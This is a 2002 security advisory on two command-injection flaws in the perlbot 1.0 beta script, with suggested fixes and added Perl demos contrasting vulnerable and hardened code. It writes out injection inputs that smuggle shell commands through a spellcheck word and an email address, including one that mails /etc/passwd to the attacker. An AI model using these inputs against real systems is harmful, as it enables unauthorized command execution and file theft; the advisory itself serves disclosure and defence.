81655 2002-10-19  01:04  /111 lines/ guejez <guejez@scan-associates.net>
Imported: 2002-10-19  01:04  by Brevbäraren
External recipient: vulnwatch@vulnwatch.org
Recipient: Bugtraq (import) <2017>
Subject: SCAN Associates Advisory: madhater perlbot 1.0 beta - Remote Command Execution
------------------------------------------------------------
perlbot 1.0 beta - Remote Command Execution
Discovered By guejez of scan-associates.net

 About perlbot:
 ------------------
 [quote from perlbot website]

 ""

 [/quote from perlbot website]

 perlbot is available at http://stigmata.gothcafe.com/~madhater


 Vulnerable (tested) Versions:
 --------------------
 Perlbot version 1.0 beta on SuSe 7.3


 Vendor Contact:
 ----------------
 07-22-02 - Emailed myneid ^^at^^ gothcafe.com alerting him of this vulnerability
 07-22-02 - Received email confirming the vulnerabilities and stating fixes could be
            in a new version.


 Vulnerabilities:
 ----------------
 -- Command Execution

 1. Due to no input filtering and a call to the shell, the script can be used to
    execute any command the account it runs under has permission to.

    A more detailed explanation:

 The script does not restrict the characters that user input can pass to the
 shell.  The problem is in this line:

 foreach(`/bin/echo "$word" | /usr/local/bin/ispell -a`)

 Perl interpolates $word into the command string and hands it to /bin/sh, and
 double quotes do not stop the shell from interpreting ", $ and backticks.  An
 attacker can therefore "break out" of the quotes and issue any command they
 wish with something like anything";cmd.  Other abuses are issuing commands
 with `cmd` or $(cmd), both of which the shell evaluates even inside the double
 quotes, or \xxx where xxx is the octal value of any character.  Some form of
 user input filtering must be used.
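 The two forms side by side, as an added example that is not perlbot's code: ispell is replaced by the stand-in command tr a-z A-Z (an assumption, so the script runs on any Unix without ispell), the attacker input $evil is constructed, and spellcheck_unsafe and spellcheck_safe are hypothetical names. The hardened version keeps the shell out of the picture entirely by running the program in list form through IPC::Open2 and writing the word to its standard input, which is stricter than filtering characters.

```perl
#!/usr/bin/perl
# Added example, not perlbot's code: the interpolated-backtick pattern from the
# advisory beside a shell-free replacement.  ispell is replaced by the stand-in
# command "tr a-z A-Z" (an assumption, so this runs without ispell installed),
# and the unsafe form prints the command line before running it so that the
# shell's view of the attacker's input is visible.
use strict;
use warnings;
use IPC::Open2;

# Constructed attacker input: closes the "$word" quotes and appends a command.
my $evil = 'anything"; id; echo "';

# Vulnerable form (perlbot's pattern): $word is interpolated into a command
# string and the backticks hand that string to /bin/sh -c.
sub spellcheck_unsafe {
    my ($word) = @_;
    my $cmd = qq{/bin/echo "$word" | tr a-z A-Z};
    print "shell sees: $cmd\n";
    return [ `$cmd` ];
}

# Hardened form: list-form open2 execs the program directly, with no shell in
# between, so quotes, ';', backticks and $(...) in $word are just bytes on its
# standard input.
sub spellcheck_safe {
    my ($word) = @_;
    my $pid = open2(my $out, my $in, 'tr', 'a-z', 'A-Z');
    print {$in} "$word\n";
    close $in;
    my @lines = <$out>;
    close $out;
    waitpid($pid, 0);
    return \@lines;
}

print "--- unsafe: the injected id command runs ---\n";
print @{ spellcheck_unsafe($evil) };
print "--- safe: the same input is only upper-cased ---\n";
print @{ spellcheck_safe($evil) };
```

 In the unsafe run the shell sees /bin/echo "anything"; id; echo "" | tr a-z A-Z, so the output of id appears among the returned lines; in the safe run the whole string, quotes and all, comes back as ANYTHING"; ID; ECHO ".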


 2. Due to no input filtering and a bad open() call when the script attempts to
    send email, it is possible to execute commands.

    A more detailed explanation:

 The script attempts to send an email to the user.  It takes the user's email
 address and passes it to the shell as an argument to the mail program:

 open (MAIL,"| $sendmail $recipient") || die $!;

 A two-argument open() beginning with "|" passes the rest of the string to
 /bin/sh whenever it contains shell metacharacters, so an email address such as
 hacker@scan-associates.net < /etc/passwd redirects the mailer's standard input
 and mails the attacker any file the script has permission to read, in place of
 the intended message.  Command execution is possible with
 hacker@scan-associates.net ; cmd.  To prevent this, simply take the $recipient
 value out of the shell call.


 Proof Of Concept:
 -----------------
 No proof of concept will be given for these issues.


 Fix:
 ----
 According to the author a fix could be in a new version of the script.  The
 script's homepage was down at the time of this advisory, so here is the
 suggested fix.  Replace the following line:

 my $word=$';

 With:

 my $word=$';
 $word =~ s/[^\w]//g;

 This strips every character outside \w (letters, digits and underscore) from
 $word before it reaches the shell, so quotes, semicolons, backticks, $ and
 backslashes can no longer get through.  A stricter alternative is to keep the
 shell out of the picture altogether by running ispell with a list-form open or
 IPC::Open2 and writing $word to its standard input.

 And replace the following line:

 open (MAIL,"| $sendmail $recipient") || die $!;

 With:

 open (MAIL,"| $sendmail -t") || die $!;

 With -t, sendmail takes the recipients from the To:, Cc: and Bcc: headers of
 the message it reads on standard input, so the script must print a To: header
 carrying $recipient, and $recipient must still be checked before it goes
 there: an embedded newline would let an attacker add headers of their own.
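 The mail pipe from vulnerability 2 and this fix side by side, as an added example that is not perlbot's code: sendmail is replaced by the stand-in /bin/sh -c cat (an assumption; like sendmail it ignores what it is given in argv and reads the message from standard input, but it prints the bytes instead of delivering them), the attacker addresses $exfil and $inject are constructed, and valid_recipient, send_unsafe and send_safe are hypothetical names. The hardened form keeps -t, starts the mailer in list form so no shell ever sees the address, and refuses any address that is not a single line of address characters, since with -t the address ends up in the headers.

```perl
#!/usr/bin/perl
# Added example, not perlbot's code: the recipient-in-a-shell-pipe pattern from
# the advisory beside the "-t" fix and the address check that fix still needs.
# sendmail is replaced by the stand-in "/bin/sh -c cat" (an assumption: like
# sendmail it ignores its argv and reads the message from stdin, but it copies
# the bytes to stdout instead of delivering them).
use strict;
use warnings;
$| = 1;   # keep our own output in order with what the stand-in mailer prints

my @sendmail = ('/bin/sh', '-c', 'cat');

# Constructed attacker-controlled addresses.
my $exfil  = 'hacker@example.com < /etc/passwd';               # shell redirect
my $inject = "victim\@example.com\nBcc: hacker\@example.com";  # header injection

# Vulnerable form (perlbot's pattern): the address is pasted into a command
# line that /bin/sh parses, so "< /etc/passwd" becomes the mailer's stdin.
sub send_unsafe {
    my ($recipient, $body) = @_;
    local $SIG{PIPE} = 'IGNORE';   # the mailer reads the file, not our pipe,
                                   # so the pipe may be closed before we write
    open(my $mail, "| @sendmail $recipient") or die "open: $!";
    print {$mail} "To: $recipient\n\n$body\n";   # never reaches the mailer
    close $mail;
    return 1;
}

# Address check: one token of address characters only, no whitespace, no shell
# or header metacharacters; \z rather than $ so a trailing newline is refused.
sub valid_recipient {
    my ($addr) = @_;
    return $addr =~ /\A[A-Za-z0-9._%+-]+\@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+\z/ ? 1 : 0;
}

# Hardened form: validated address, mailer started in list form (no shell) with
# -t so it takes the recipient from the To: header rather than from argv.
sub send_safe {
    my ($recipient, $body) = @_;
    return 0 unless valid_recipient($recipient);
    open(my $mail, '|-', @sendmail, '-t') or die "open: $!";
    print {$mail} "To: $recipient\n\n$body\n";
    close $mail;
    return 1;
}

print "--- unsafe: /etc/passwd is mailed instead of the message ---\n";
send_unsafe($exfil, 'your password reminder');

print "--- safe: attacker addresses are refused, a normal one is mailed ---\n";
for my $addr ($exfil, $inject, 'user@example.com') {
    (my $shown = $addr) =~ s/\n/\\n/g;            # make the injected newline visible
    my $ok = send_safe($addr, 'your password reminder');
    print "$shown => ", ($ok ? "sent\n" : "rejected\n");
}
```

 The unsafe call prints the contents of /etc/passwd, because the shell redirected the stand-in mailer's input to that file and the message the script wrote into the pipe was discarded. The safe call rejects both constructed addresses and, for user@example.com, prints the To: header followed by the body, which is exactly what the real sendmail -t would parse for its recipient.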


 Thanks:
 -------
 irc.efnet.org #vuln - various people helping with perl security issues.
 pokleyzz, sk, and all of scan-associates.net


--------------------------------------------------------------------------
http://www.scan-associates.net/